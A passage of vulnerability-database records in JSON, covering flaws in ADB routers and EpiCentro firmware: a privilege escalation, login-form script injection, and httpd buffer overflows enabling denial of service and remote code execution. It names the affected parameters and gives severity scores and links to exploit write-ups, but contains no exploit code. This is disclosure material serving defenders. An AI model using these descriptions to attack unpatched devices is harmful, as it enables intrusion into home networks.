"db": "VULHUB",
"id": "VHN-123137",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"id": "VAR-201807-1047",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
}
]
},
"last_update_date": "2023-12-18T13:28:50.326000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
},
{
"title": "Patch for ADBBroadbandGateways/Routers Privilege Escalation Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/133903"
},
{
"title": "ADB broadband gateways/routers on Epicentro platform Fixes for permission permissions and access control vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81863"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-732",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/148430/adb-group-manipulation-privilege-escalation.html"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2018/jul/19"
},
{
"trust": 2.3,
"url": "https://www.exploit-db.com/exploits/44984/"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/542118/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-13110"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-13110"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"date": "2018-07-06T00:00:00",
"db": "VULHUB",
"id": "VHN-123137"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"date": "2018-07-06T14:29:01.163000",
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"date": "2018-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-123137"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ADB Vulnerabilities related to authorization, authority, and access control in broadband gateways and routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
],
"trust": 0.6
}
}
VAR-201810-1458
Vulnerability from variot - Updated: 2023-12-18 13:23
Code injection in the /ui/login form Language parameter in Epicentro E_7.3.2+ allows attackers to execute JavaScript code by making a user issue a manipulated POST request. Epicentro contains a code injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). ADB Epicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers.
CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633
Product: EpiCentro
Vendor: ADB Global
Tested Version: 7.3.2
CVE ID: 2018-7633
Severity: medium
Severity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Impact: Execution of injected Javascript
Locally Exploitable: no
Remotely Exploitable: Yes
Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/
-
CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632
Product: EpiCentro
Vendor: ADB Global
Tested Version: 7.3.2
CVE ID: 2018-7632
Severity: severe
Severity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Impact: Denial of Service
Locally Exploitable: no
Remotely Exploitable: Yes
Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/
-
CVE-2018-7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE)
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632
Product: EpiCentro
Vendor: ADB Global
Tested Version: 7.3.2
CVE ID: 2018-7631
Severity: critical
Severity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Impact: Code Execution
Locally Exploitable: no
Remotely Exploitable: Yes
Explanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/
The vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity.
Felix
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-1458",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "epicentro",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": "7.3.2"
},
{
"model": "epicentro",
"scope": "eq",
"trust": 0.8,
"vendor": "adb",
"version": "7.3.2"
},
{
"model": "epicentro e 7.3.2+",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:epicentro:7.3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7633"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Schallock",
"sources": [
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 0.1
},
"cve": "CVE-2018-7633",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7633",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-20757",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7633",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7633",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-20757",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-489",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Code injection in the /ui/login form Language parameter in Epicentro E_7.3.2+ allows attackers to execute JavaScript code by making a user issue a manipulated POST request. Epicentro Contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBEpicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7633\nSeverity: medium\nSeverity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N\nImpact: Execution of injected Javascript\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e \n\n2. 
CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7632\nSeverity: severe\nSeverity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\nImpact: Denial of Service\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e\n\n3. CVE-2018- 7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7631\nSeverity: critical\nSeverity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\nImpact: Code Execution\nLocally Exploitable: no\nRemotely Exploitable: Yes\n\nExplanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/ \u003chttps://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e \n\nThe vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity. 
\n\nFelix\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7633",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-20757",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "149976",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"id": "VAR-201810-1458",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
}
]
},
"last_update_date": "2023-12-18T13:23:55.745000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-94",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7631"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633\u003e"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"date": "2018-10-26T23:22:22",
"db": "PACKETSTORM",
"id": "149976"
},
{
"date": "2018-10-09T22:29:02.047000",
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"date": "2018-12-10T17:33:50.297000",
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB Epicentro Code Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
],
"trust": 0.6
}
}
VAR-201810-1456
Vulnerability from variot - Updated: 2023-12-18 13:23

Buffer Overflow in httpd in EpiCentro E_7.3.2+ allows attackers to execute code remotely via a specially crafted GET request without a leading "/" and without authentication. Epicentro contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). ADB Epicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. Httpd is one of the HTTP servers. A buffer overflow vulnerability exists in httpd in the ADB Epicentro E_7.3.2+ release.

- CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633
  Product: EpiCentro
  Vendor: ADB Global
  Tested Version: 7.3.2
  CVE ID: 2018-7633
  Severity: medium
  Severity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
  Impact: Execution of injected Javascript
  Locally Exploitable: no
  Remotely Exploitable: Yes
  Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/
- CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632
  Product: EpiCentro
  Vendor: ADB Global
  Tested Version: 7.3.2
  CVE ID: 2018-7632
  Severity: severe
  Severity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  Impact: Denial of Service
  Locally Exploitable: no
  Remotely Exploitable: Yes
  Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/
- CVE-2018-7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE)
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632
  Product: EpiCentro
  Vendor: ADB Global
  Tested Version: 7.3.2
  CVE ID: 2018-7631
  Severity: critical
